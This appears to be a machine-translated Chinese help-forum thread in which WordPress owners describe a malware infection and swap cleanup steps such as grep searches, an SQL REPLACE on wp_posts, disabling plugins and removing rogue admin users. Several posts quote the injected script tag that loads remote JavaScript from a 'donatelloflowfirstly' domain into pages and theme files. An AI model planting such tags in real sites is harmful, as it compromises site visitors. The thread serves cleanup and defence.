问题描述
随机Java脚本不断在每个页面上添加我的WordPress网站,我应该如何删除它们?
一些恶意软件进入我的WordPress网站,并在每个帖子和页面中插入了这些类型的脚本,我该如何删除它,所以我不必一个个地手动
他们甚至将此脚本插入了robots.txt和每个媒体项目的描述中
Crome Inspect ... editor
" <script src='https://js.donatelloflowfirstly. ga/stat.js?n=ns1' type='text/javascript'></script> "
解决方法
要么先逐个禁用插件,然后找出罪魁祸首是否来自您的一个插件。然后,如果它没有消失,请尝试更改主题。
或者,下载整个文件并使用grep4win之类的东西在整个文件夹中搜索特定的字符串(在您的情况下为js.donatelloflowfirst)可能会更容易。
,检查您的publich_html目录。.也许您会找到一个名为_a的文件 是注入的恶意软件注入代码
.每个帖子和每个index.php文件
10个小时前我遇到了同样的问题,并且清理了我的网站
这是_a恶意软件文件的内容:
<script src='https://js.donatelloflowfirstly. ga/stat.js?n=ns1' type='text/javascript'></script>
如您所见,该代码显示数据库登录信息,并将脚本代码注入到任何index.php文件以及主题函数中。
我进行了搜索并替换了db,并从所有wp_posts表中清除了此代码 几乎删除了所有插件,因为它感染了整个主目录中的所有index.php文件。
,它可以像这样https://gist.github.com/riper81/70e6fa8ac703d105490b6f5bb1708436
放在header.php中但是现在删除它毫无意义。首先,您需要找出黑客如何到达服务器并修复漏洞。它可能是Wordpress引擎/插件,主题(甚至不处于活动状态)/自定义脚本/同一服务器上其他站点的易受攻击的版本。
,Guyz,需要您的帮助。我的网站被黑了,我缺乏专业知识才能摆脱困境。
我在Index.php中找到了这段代码
<script type='text/javascript' src='https://js.donatelloflowfirstly.ga/stats.js?n=nb5'></script><script type='text/javascript' src='https://js.donatelloflowfirstly.ga/stats.js?n=nb5'></script><?php
但是我无法删除它
,除了那儿,我还是做了所有的事:
- 下载了所有文件并一个人清理
- 手动从每个页面中删除脚本并发布
- 使用SQL查询,并按照指南中的说明从数据库中删除了脚本
现在:
- 停用所有插件:工作
- 如果我激活ELEMENTRO:不工作和重定向所有页面
我试图从FTP中手动删除elementor并安装新的但仍然相同的
- 我用Wordfence扫描了4次,并清理或删除了插件
- 使用GOTMLS进行扫描并清除了所有文件
当ELEMENTOR处于活动状态时,仍保持相同。花了8个小时。感谢您的帮助。
,我感染了这种病毒,几乎每天晚上10点他们都会攻击我的网站。尽管我已经清理了上述所有恶意软件。 刚才我发现异常。我检查了这个被黑网站的数据库中是否有奇怪的用户名,以及所有我从未添加过的特权用户。 也许他们通过此特权用户注入了恶意软件。 现在,我删除此特权用户,我们将看到接下来将发生什么。 希望这可以解决问题。
,我已经受到第二次恶意软件攻击,它在星期五发生,这是我第一次从数据库中清除所有脚本以搜索“ donatello”时,在找到条目之后,我对银行: UPDATE wp_posts SET post_content = (REPLACE (post_content,“<script src = 'https: //js.donatelloflowfirstly.ga/stat.js? n = ns1 ′ type =' text / javascript '> </script>”,' ') );
然后只有一个参议员开始工作,上周五又回来了,我找不到这些记录,看来行事方式已经改变了。 我刚刚发现它位于主题的 FUNCTIONS.PHP 和 HEADER.PHP 文件的第一行中,我删除了这些行,然后又可以正常工作,但是我仍然不知道问题的根源。